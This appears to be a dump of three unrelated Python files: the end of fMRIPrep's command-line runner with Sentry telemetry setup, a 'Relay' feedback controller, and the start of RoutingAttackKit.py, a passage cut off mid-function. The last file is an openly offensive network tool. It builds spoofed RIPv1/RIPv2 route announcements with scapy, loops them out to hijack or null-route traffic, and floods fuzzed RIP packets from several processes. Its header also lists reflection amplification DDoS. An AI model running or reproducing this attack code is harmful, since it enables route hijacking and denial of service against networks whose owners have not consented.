from ..viz.reports import generate_reports
from ..utils.bids import write_derivative_description
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
exec_env = os.name
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
exec_env = 'singularity'
cgroup = Path('/proc/1/cgroup')
if cgroup.exists() and 'docker' in cgroup.read_text():
exec_env = 'docker'
if os.getenv('DOCKER_VERSION_8395080871'):
exec_env = 'fmriprep-docker'
sentry_sdk = None
if not opts.notrack:
import sentry_sdk
from ..__about__ import __version__
environment = "prod"
release = __version__
if not __version__:
environment = "dev"
release = "dev"
elif bool(int(os.getenv('FMRIPREP_DEV', 0))) or ('+' in __version__):
environment = "dev"
def before_send(event, hints):
# Filtering log messages about crashed nodes
if 'logentry' in event and 'message' in event['logentry']:
msg = event['logentry']['message']
if msg.startswith("could not run node:"):
return None
elif msg.startswith("Saving crash info to "):
return None
elif re.match("Node .+ failed to run on host .+", msg):
return None
if 'breadcrumbs' in event and isinstance(event['breadcrumbs'], list):
fingerprints_to_propagate = ['no-disk-space', 'memory-error', 'permission-denied',
'keyboard-interrupt']
for bc in event['breadcrumbs']:
msg = bc.get('message', 'empty-msg')
if msg in fingerprints_to_propagate:
event['fingerprint'] = [msg]
break
return event
sentry_sdk.init("https://d5a16b0c38d84d1584dfc93b9fb1ade6@sentry.io/1137693",
release=release,
environment=environment,
before_send=before_send)
with sentry_sdk.configure_scope() as scope:
scope.set_tag('exec_env', exec_env)
if exec_env == 'fmriprep-docker':
scope.set_tag('docker_version', os.getenv('DOCKER_VERSION_8395080871'))
free_mem_at_start = round(psutil.virtual_memory().free / 1024**3, 1)
scope.set_tag('free_mem_at_start', free_mem_at_start)
scope.set_tag('cpu_count', cpu_count())
# Memory policy may have a large effect on types of errors experienced
overcommit_memory = Path('/proc/sys/vm/overcommit_memory')
if overcommit_memory.exists():
policy = {'0': 'heuristic',
'1': 'always',
'2': 'never'}.get(overcommit_memory.read_text().strip(), 'unknown')
scope.set_tag('overcommit_memory', policy)
if policy == 'never':
overcommit_kbytes = Path('/proc/sys/vm/overcommit_memory')
kb = overcommit_kbytes.read_text().strip()
if kb != '0':
limit = '{}kB'.format(kb)
else:
overcommit_ratio = Path('/proc/sys/vm/overcommit_ratio')
limit = '{}%'.format(overcommit_ratio.read_text().strip())
scope.set_tag('overcommit_limit', limit)
else:
scope.set_tag('overcommit_limit', 'n/a')
else:
scope.set_tag('overcommit_memory', 'n/a')
scope.set_tag('overcommit_limit', 'n/a')
for k, v in vars(opts).items():
scope.set_tag(k, v)
# Validate inputs
if not opts.skip_bids_validation:
print("Making sure the input data is BIDS compliant (warnings can be ignored in most "
"cases).")
validate_input_dir(exec_env, opts.bids_dir, opts.participant_label)
# FreeSurfer license
default_license = str(Path(os.getenv('FREESURFER_HOME')) / 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or os.getenv('FS_LICENSE', default_license)
if not os.path.exists(license_file):
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'FMRIPREP looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html')
os.environ['FS_LICENSE'] = license_file
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
fmriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
bids_dir = retval['bids_dir']
output_dir = retval['output_dir']
work_dir = retval['work_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
if not opts.notrack:
with sentry_sdk.configure_scope() as scope:
scope.set_tag('run_uuid', run_uuid)
scope.set_tag('npart', len(subject_list))
retcode = retval['return_code']
if fmriprep_wf is None:
sys.exit(1)
if opts.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
# Sentry tracking
if not opts.notrack:
sentry_sdk.add_breadcrumb(message='fMRIPrep started', level='info')
sentry_sdk.capture_message('fMRIPrep started', level='info')
# Check workflow for missing commands
missing = check_deps(fmriprep_wf)
if missing:
print("Cannot run fMRIPrep. Missing dependencies:")
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
fmriprep_wf.run(**plugin_settings)
except RuntimeError as e:
errno = 1
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
raise
finally:
# Generate reports phase
errno += generate_reports(subject_list, output_dir, work_dir, run_uuid,
sentry_sdk=sentry_sdk)
write_derivative_description(bids_dir, str(Path(output_dir) / 'fmriprep'))
if not opts.notrack and errno == 0:
sentry_sdk.capture_message('fMRIPrep finished without errors', level='info')
sys.exit(int(errno > 0))
def validate_input_dir(exec_env, bids_dir, participant_label):
# Ignore issues and warnings that should not influence FMRIPREP
validator_config_dict = {
"ignore": [
"EVENTS_COLUMN_ONSET",
"EVENTS_COLUMN_DURATION",
"TSV_EQUAL_ROWS",
"TSV_EMPTY_CELL",
"TSV_IMPROPER_NA",
"VOLUME_COUNT_MISMATCH",
"BVAL_MULTIPLE_ROWS",
"BVEC_NUMBER_ROWS",
"DWI_MISSING_BVAL",
"INCONSISTENT_SUBJECTS",
"INCONSISTENT_PARAMETERS",
"BVEC_ROW_LENGTH",
"B_FILE",
"PARTICIPANT_ID_COLUMN",
"PARTICIPANT_ID_MISMATCH",
"TASK_NAME_MUST_DEFINE",
"PHENOTYPE_SUBJECTS_MISSING",
"STIMULUS_FILE_MISSING",
"DWI_MISSING_BVEC",
"EVENTS_TSV_MISSING",
"TSV_IMPROPER_NA",
"ACQTIME_FMT",
"Participants age 89 or higher",
"DATASET_DESCRIPTION_JSON_MISSING",
"FILENAME_COLUMN",
"WRONG_NEW_LINE",
"MISSING_TSV_COLUMN_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_ELECTRODES",
"UNUSED_STIMULUS",
"CHANNELS_COLUMN_SFREQ",
"CHANNELS_COLUMN_LOWCUT",
"CHANNELS_COLUMN_HIGHCUT",
"CHANNELS_COLUMN_NOTCH",
"CUSTOM_COLUMN_WITHOUT_DESCRIPTION",
"ACQTIME_FMT",
"SUSPICIOUSLY_LONG_EVENT_DESIGN",
"SUSPICIOUSLY_SHORT_EVENT_DESIGN",
"MALFORMED_BVEC",
"MALFORMED_BVAL",
"MISSING_TSV_COLUMN_EEG_ELECTRODES",
"MISSING_SESSION"
],
"error": ["NO_T1W"],
"ignoredFiles": ['/dataset_description.json', '/participants.tsv']
}
# Limit validation only to data from requested participants
if participant_label:
all_subs = set([os.path.basename(i)[4:] for i in glob(os.path.join(bids_dir,
"sub-*"))])
selected_subs = []
for selected_sub in participant_label:
if selected_sub.startswith("sub-"):
selected_subs.append(selected_sub[4:])
else:
selected_subs.append(selected_sub)
selected_subs = set(selected_subs)
bad_labels = selected_subs.difference(all_subs)
if bad_labels:
error_msg = 'Data for requested participant(s) label(s) not found. Could ' \
'not find data for participant(s): %s. Please verify the requested ' \
'participant labels.'
if exec_env == 'docker':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the docker container. Please make sure all ' \
'volumes are mounted properly (see https://docs.docker.com/' \
'engine/reference/commandline/run/#mount-volume--v---read-only)'
if exec_env == 'singularity':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the singularity container. Please make sure ' \
'all paths are mapped properly (see https://www.sylabs.io/' \
'guides/3.0/user-guide/bind_paths_and_mounts.html)'
raise RuntimeError(error_msg % ','.join(bad_labels))
ignored_subs = all_subs.difference(selected_subs)
if ignored_subs:
for sub in ignored_subs:
validator_config_dict["ignoredFiles"].append("/sub-%s/**" % sub)
with tempfile.NamedTemporaryFile('w+') as temp:
temp.write(json.dumps(validator_config_dict))
temp.flush()
try:
subprocess.check_call(['bids-validator', bids_dir, '-c', temp.name])
except FileNotFoundError:
logger.error("bids-validator does not appear to be installed")
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows fmriprep to enforce
a hard-limited memory-scope.
"""
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
from shutil import copyfile
from nipype import logging, config as ncfg
from niworkflows.utils.bids import collect_participants
from ..__about__ import __version__
from ..workflows.base import init_fmriprep_wf
from ..viz.reports import generate_reports
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running fMRIPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
""".format
output_spaces = opts.output_space or []
# Validity of some inputs
# ERROR check if use_aroma was specified, but the correct template was not
if opts.use_aroma and (opts.template != 'MNI152NLin2009cAsym' or
'template' not in output_spaces):
output_spaces.append('template')
logger.warning(
'Option "--use-aroma" requires functional images to be resampled to MNI space. '
'The argument "template" has been automatically added to the list of output '
'spaces (option "--output-space").'
)
# Check output_space
if 'template' not in output_spaces and (opts.use_syn_sdc or opts.force_syn):
msg = ['SyN SDC correction requires T1 to MNI registration, but '
'"template" is not specified in "--output-space" arguments.',
'Option --use-syn will be cowardly dismissed.']
if opts.force_syn:
output_spaces.append('template')
msg[1] = (' Since --force-syn has been requested, "template" has been added to'
' the "--output-space" list.')
logger.warning(' '.join(msg))
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = os.path.abspath(opts.bids_dir)
subject_list = collect_participants(
bids_dir, participant_label=opts.participant_label)
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nthreads = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nthreads is None or opts.nthreads is not None:
nthreads = opts.nthreads
if nthreads is None or nthreads < 1:
nthreads = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nthreads
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
# Set up directories
output_dir = op.abspath(opts.output_dir)
log_dir = op.join(output_dir, 'fmriprep', 'logs')
work_dir = op.abspath(opts.work_dir or 'work') # Set work/ as default
# Check and create output and working directories
os.makedirs(output_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(work_dir, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': log_dir,
'log_to_file': True
},
'execution': {
'crashdump_dir': log_dir,
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash or opts.work_dir is None,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['bids_dir'] = bids_dir
retval['output_dir'] = output_dir
retval['work_dir'] = work_dir
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, output_dir, work_dir, run_uuid)
return retval
# Build main workflow
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid)
)
template_out_grid = opts.template_resampling_grid
if opts.output_grid_reference is not None:
logger.warning(
'Option --output-grid-reference is deprecated, please use '
'--template-resampling-grid')
template_out_grid = template_out_grid or opts.output_grid_reference
if opts.debug:
logger.warning('Option --debug is deprecated and has no effect')
retval['workflow'] = init_fmriprep_wf(
subject_list=subject_list,
task_id=opts.task_id,
echo_idx=opts.echo_idx,
run_uuid=run_uuid,
ignore=opts.ignore,
debug=opts.sloppy,
low_mem=opts.low_mem,
anat_only=opts.anat_only,
longitudinal=opts.longitudinal,
t2s_coreg=opts.t2s_coreg,
omp_nthreads=omp_nthreads,
skull_strip_template=opts.skull_strip_template,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
work_dir=work_dir,
output_dir=output_dir,
bids_dir=bids_dir,
freesurfer=opts.run_reconall,
output_spaces=output_spaces,
template=opts.template,
medial_surface_nan=opts.medial_surface_nan,
cifti_output=opts.cifti_output,
template_out_grid=template_out_grid,
hires=opts.hires,
use_bbr=opts.use_bbr,
bold2t1w_dof=opts.bold2t1w_dof,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
use_syn=opts.use_syn_sdc,
force_syn=opts.force_syn,
use_aroma=opts.use_aroma,
aroma_melodic_dim=opts.aroma_melodic_dimensionality,
ignore_aroma_err=opts.ignore_aroma_denoising_errors,
)
retval['return_code'] = 0
logs_path = Path(output_dir) / 'fmriprep' / 'logs'
boilerplate = retval['workflow'].visit_desc()
if boilerplate:
(logs_path / 'CITATION.md').write_text(boilerplate)
logger.log(25, 'Works derived from this fMRIPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.html')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTex file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--natbib', str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.tex')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
else:
copyfile(pkgrf('fmriprep', 'data/boilerplate.bib'),
(logs_path / 'CITATION.bib'))
return retval
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
runner.py
|
from __future__ import division
from collections import deque
import numpy as np
import os
from os.path import abspath, dirname, join
import subprocess
import sys
import time
import threading
from relay import log, configure_logging, add_zmq_log_handler
from relay import util
from relay import argparse_shared as at
def start_webui():
cwd = join(dirname(dirname(abspath(__file__))), 'web/src')
log.info("Starting node.js webui in a subshell")
subprocess.Popen(
'cd %s ; node index.js' % cwd, shell=True,
preexec_fn=os.setsid) # guarantee that the child process exits with me
@util.coroutine
def window(n, initial_data=()):
win = deque(initial_data, n)
while 1:
win.append((yield win))
def calc_weight(errdata):
sp = np.fft.fft(errdata)[1: len(errdata) // 2]
if sp.sum() == 0: # there is no variation in the signal
log.warn('no variation in the signal. fft cannot continue')
return 1
# get the phase in radians # -np.pi < phase <= +np.pi
phase = np.angle(sp) # radians
# find the amplitude integral of neighboring samples.
# search <360 degrees to left of most recent sample's phase
# p_k = phase - degrees_between_samples * k # kth phase
amplitude_integrals = np.abs(np.sin(phase)) # iteratively updated
# samples per cycle
kth = len(errdata) / np.arange(1, len(errdata) // 2)
num_degrees_between_samples = 2 * np.pi / kth
p_k = phase.copy()
while (kth > 0).any():
# find amplitude of a sign wave at specific phase
p_k -= num_degrees_between_samples
amplitude_integrals += np.abs(np.sin(p_k))
kth -= 1
idxs = kth > 0
not_idxs = ~idxs
kth[not_idxs] = 0
p_k[not_idxs] = 0
num_degrees_between_samples[not_idxs] = 0
# get the amplitude of each frequency in the fft spectrum
amplitude = np.abs(sp)
return (
# np.sin(phase)
(np.sin(phase) / amplitude_integrals)
* (amplitude / amplitude.sum())
).sum()
def create_ramp_plan(err, ramp):
"""
Formulate and execute on a plan to slowly add heat or cooling to the system
`err` initial error (PV - SP)
`ramp` the size of the ramp
A ramp plan might yield MVs in this order at every timestep:
[5, 0, 4, 0, 3, 0, 2, 0, 1]
where err == 5 + 4 + 3 + 2 + 1
"""
if ramp == 1: # basecase
yield int(err)
while True:
yield 0
# np.arange(n).sum() == err
# --> solve for n
# err = (n - 1) * (n // 2) == .5 * n**2 - .5 * n
# 0 = n**2 - n --> solve for n
n = np.abs(np.roots([.5, -.5, 0]).max())
niter = int(ramp // (2 * n)) # 2 means add all MV in first half of ramp
MV = n
log.info('Initializing a ramp plan', extra=dict(
ramp_size=ramp, err=err, niter=niter))
for x in range(int(n)):
budget = MV
for x in range(niter):
budget -= MV // niter
yield int(np.sign(err) * (MV // niter))
yield int(budget * np.sign(err))
MV -= 1
while True:
yield 0
def validate_ns_or_sysexit(ns):
ex = 0
if None in [ns.target, ns.metric]:
log.error("you must define a --metric and --target!")
ex = 1
if ns.warmer is None and ns.cooler is None:
log.error("you must define either a --warmer or a --cooler!")
ex = 1
if ex:
build_arg_parser().print_usage()
sys.exit(1)
def evaluate_stop_condition(errdata, stop_condition):
"""
Call the user-defined function: stop_condition(errdata)
If the function returns -1, do nothing. Otherwise, sys.exit.
"""
if stop_condition:
return_code = stop_condition(list(errdata))
if return_code != -1:
log.info(
'Stop condition triggered! Relay is terminating.',
extra=dict(return_code=return_code))
sys.exit(return_code)
def main(ns):
validate_ns_or_sysexit(ns)
configure_logging(True)
if ns.sendstats:
if ns.sendstats == 'webui':
add_zmq_log_handler('ipc:///tmp/relaylog')
start_webui()
else:
add_zmq_log_handler(ns.sendstats)
log.info(
"Starting relay!", extra={k: str(v) for k, v in ns.__dict__.items()})
metric = ns.metric()
target = ns.target()
errhist = window(ns.lookback)
ramp_index = 0
while True:
SP = next(target) # set point
PV = next(metric) # process variable
err = (SP - PV)
log.debug('got metric value', extra=dict(PV=PV, SP=SP))
if ramp_index < ns.ramp:
if ramp_index == 0:
plan = create_ramp_plan(err, ns.ramp)
ramp_index += 1
MV = next(plan)
errdata = errhist.send(0)
else:
errdata = errhist.send(err)
weight = calc_weight(errdata)
MV = int(round(err - weight * sum(errdata) / len(errdata)))
log.info('data', extra=dict(data=[
err, weight,
sum(errdata) / len(errdata)]))
if MV > 0:
if ns.warmer:
log.debug('adding heat', extra=dict(MV=MV, err=err))
threading.Thread(target=ns.warmer, args=(MV,)).start()
else:
log.warn('too cold')
elif MV < 0:
if ns.cooler:
log.debug('removing heat', extra=dict(MV=MV, err=err))
threading.Thread(target=ns.cooler, args=(MV,)).start()
else:
log.warn('too hot')
else:
log.debug(
'stabilized PV at setpoint', extra=dict(MV=MV, PV=PV, SP=SP))
time.sleep(ns.delay)
evaluate_stop_condition(list(errdata), ns.stop_condition)
build_arg_parser = at.build_arg_parser([
at.group(
"What is Relay optimizing?",
at.metric, at.target),
at.group(
"Instruct Relay how to heat or cool your metric",
at.warmer, at.cooler),
at.group(
"Some optional Relay parameters",
at.delay, at.lookback, at.ramp, at.sendstats, at.stop_condition),
])
|
RoutingAttackKit.py
|
#!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
#
import sys
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
if config['verbose'] or config['debug']:
sys.stdout.write(x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[.] ' + x)
@staticmethod
def dbg(x):
if config['debug']:
Logger._out('[dbg] ' + x)
@staticmethod
def err(x):
sys.stdout.write('[!] ' + x + '\n')
@staticmethod
def fail(x):
Logger._out('[-] ' + x)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
# Well, not very fuzzy that fuzzer I know.
class Fuzzer:
@staticmethod
def get8bitFuzzes():
out = set()
for i in range(9):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**8]
@staticmethod
def get16bitFuzzes():
out = set()
for i in range(17):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**16]
@staticmethod
def get32bitFuzzes():
out = set()
for i in range(33):
out.add(2 ** i - 1)
out.add(2 ** i - 2)
out.add(2 ** i)
out.add(2 ** i + 1)
#out.add(2 ** i + 2)
return [k for k in out if abs(k) < 2**32]
@staticmethod
def deBrujinPattern(length):
if length == 0: return ''
if length >= 20280:
out = ''
out += Fuzzer.deBrujinPattern(20280 - 1)
out += "A" * (length - 20280 - 1)
return out
pattern = ''
for upper in string.ascii_uppercase:
for lower in string.ascii_lowercase:
for digit in string.digits:
if len(pattern) < length:
pattern += upper + lower + digit
else:
out = pattern[:length]
return out
return pattern
@staticmethod
def getFuzzyStrings(maxLen = -1, allOfThem = True):
out = set()
for b in Fuzzer.get16bitFuzzes():
out.add(Fuzzer.deBrujinPattern(b))
if allOfThem:
for b in range(0, 65400, 256):
if maxLen != -1 and b > maxLen: break
out.add(Fuzzer.deBrujinPattern(b))
if maxLen != -1:
return set([x for x in out if len(x) <= maxLen])
return out
@staticmethod
def get32bitProblematicPowersOf2():
return Fuzzer.get32bitFuzzes()
class RoutingAttack:
def __init__(self):
pass
def injectOptions(self, params, config):
pass
def launch(self):
pass
class Sniffer(RoutingAttack):
def __init__(self):
pass
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
def processPacket(pkt):
# TODO
raise Exception('Not yet implemented.')
def launch(self):
# TODO
raise Exception('Not yet implemented.')
def packetCallback(d):
self.processPacket(d)
try:
pkts = sniff(
count = 1000,
filter = 'udp port 520',
timeout = 10.0,
prn = packetCallback,
iface = self.config['interface']
)
except Exception as e:
if 'Network is down' in str(e):
pass
else:
Logger.err('Exception occured during sniffing: {}'.format(str(e)))
except KeyboardInterrupt:
pass
class RIPv1v2Attacks(RoutingAttack):
ripAuthTypes = {
'simple' : 2, 'md5' : 3, 'md5authdata': 1
}
def __init__(self):
self.config = {
'interface' : '',
'delay': 1,
'network' : '',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
'version' : 0,
}
@staticmethod
def getRipAuth(config):
ripauth = RIPAuth()
ripauth.authtype = RIPv1v2Attacks.ripAuthTypes[config['auth-type']]
if ripauth.authtype == 2:
ripauth.password = config['auth-data']
elif ripauth.authtype == 1:
ripauth.authdata = config['auth-data']
elif ripauth.authtype == 3:
ripauth.digestoffset = 0
ripauth.keyid = 0
ripauth.authdatalen = len(config['auth-data'])
ripauth.seqnum = 0
return ripauth
def injectOptions(self, params, config):
self.config = config
self.config.update(params)
Logger.info("Fake Route Announcement to be injected:")
Logger.info("\tNetwork: {}".format(config['network']))
Logger.info("\tNetmask: {}".format(config['netmask']))
Logger.info("\tNexthop: {}".format(config['nexthop']))
Logger.info("\tMetric: {}".format(config['metric']))
if not config['network'] or not config['netmask'] \
or not config['nexthop'] or not config['metric']:
Logger.err("Module needs following options to operate: network, netmask, nexthop, metric")
return False
if params['version'] != 1 and params['version'] != 2:
Logger.err("RIP protocol version must be either 1 or 2 as passed in attacks params!")
return False
return True
def launch(self):
packet = self.getPacket()
Logger.info("Sending RIPv{} Spoofed Route Announcements...".format(self.config['version']))
sendp(packet, loop = 1, inter = self.config['delay'], iface = config['interface'])
def getPacket(self):
networkToAnnounce = self.config['network']
metricToAnnounce = self.config['metric']
netmaskToAnnounce = self.config['netmask']
nexthopToAnnounce = self.config['nexthop']
spoofedIp = self.config['spoof']
etherframe = Ether() # Start definition of Ethernet Frame
ip = IP() # IPv4 packet
udp = UDP()
udp.sport = 520 # According to RFC1058, 520/UDP port must be used for solicited communication
udp.dport = 520
rip = RIP()
ripentry = RIPEntry() # Announced route
ripentry.AF = "IP" # Address Family: IP
if 'AF' in self.config.keys():
ripentry.AF = self.config['AF']
ripentry.addr = networkToAnnounce # Spoof route for this network...
ripentry.metric = metricToAnnounce
if self.config['version'] == 1:
ip.dst = '255.255.255.255' # RIPv1 broadcast destination
etherframe.dst = 'ff:ff:ff:ff:ff:ff'
rip.version = 1 # RIPv1
rip.cmd = 2 # Command: Response
elif self.config['version'] == 2:
ip.dst = '224.0.0.9' # RIPv2 multicast destination
rip.version = 2 # RIPv2
rip.cmd = 2 # Command: Response
ripentry.RouteTag = 0
ripentry.mask = netmaskToAnnounce
ripentry.nextHop = nexthopToAnnounce # ... to be going through this next hop device.
if 'rip_cmd' in self.config.keys():
rip.cmd = self.config['rip_cmd']
if not self.config['auth-type']:
rip_packet = etherframe / ip / udp / rip / ripentry
else:
ripauth = RIPv1v2Attacks.getRipAuth(self.config)
Logger.info('Using RIPv2 authentication: type={}, pass="{}"'.format(
self.config['auth-type'], self.config['auth-data']
))
rip_packet = etherframe / ip / udp / rip / ripauth / ripentry
rip_packet[IP].src = spoofedIp
return rip_packet
class RIPFuzzer(RoutingAttack):
ripCommands = (
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
)
def __init__(self):
self.config = {
'interface' : '',
'network' : '192.168.1.0',
'metric' : 10,
'netmask' : '255.255.255.0',
'nexthop' : '0.0.0.0',
'spoof' : '',
}
def injectOptions(self, params, config):
self.config = config
self.params = params
return True
def launch(self):
packets = set()
Logger.info("Generating fuzzed packets for RIPv1...")
packets.update(self.generateRipv1Packets())
Logger.info("Generating fuzzed packets for RIPv2...")
packets.update(self.generateRipv2Packets())
Logger.info("Collected in total {} packets to send. Sending them out...".format(len(packets)))
packetsLists = [[] for x in range(self.config['processors'])]
packetsList = list(packets)
for i in range(len(packetsList)):
packetsLists[i % config['processors']].append(packetsList[i])
jobs = []
for i in range(config['processors']):
task = multiprocessing.Process(target = flooder, args = (i, packetsLists[i]))
jobs.append(task)
task.daemon = True
task.start()
print('[+] Started flooding. Press CTRL-C to stop that.')
try:
while jobs:
jobs = [job for job in jobs if job.is_alive()]
except KeyboardInterrupt:
stopThreads = True
print('\n[>] Stopping...')
stopThreads = True
time.sleep(3)
Logger.ok("Fuzzing finished. Sent around {} packets.".format(len(packets)))
def generateRipv1Packets(self):
packets = set()
base = Ether(dst = 'ff:ff:ff:ff:ff:ff') / IP(dst = '255.255.255.255') / UDP(sport = 520, dport = 520)
# Step 1: Fuzz on Command values.
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
packets.add(base / rip)
packets.add(base / rip / RIPEntry() )
# Step 1b: Fuzz on Command values with packet filled up with data
for val in set(RIPFuzzer.ripCommands + tuple(Fuzzer.get8bitFuzzes())):
rip = RIP(version = 1, cmd = val)
for data in Fuzzer.getFuzzyStrings():
if not data: data = ''
packets.add(base / rip / data)
packets.add(base / rip / RIPEntry() / data)
# Step 2: Fuzz on Response RIPEntry AF values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(AF = val) )
# Step 3: Fuzz on Response RIPEntry RouteTag values.
for val in set(Fuzzer.get8bitFuzzes()):
rip = RIP(version = 1, cmd = 2)
packets.add(base / rip / RIPEntry(RouteTag = val) )
# Step 4: Fuzz on Response RIPEntry metric values.
for val in set(Fuzzer.get8bitFuzzes()):
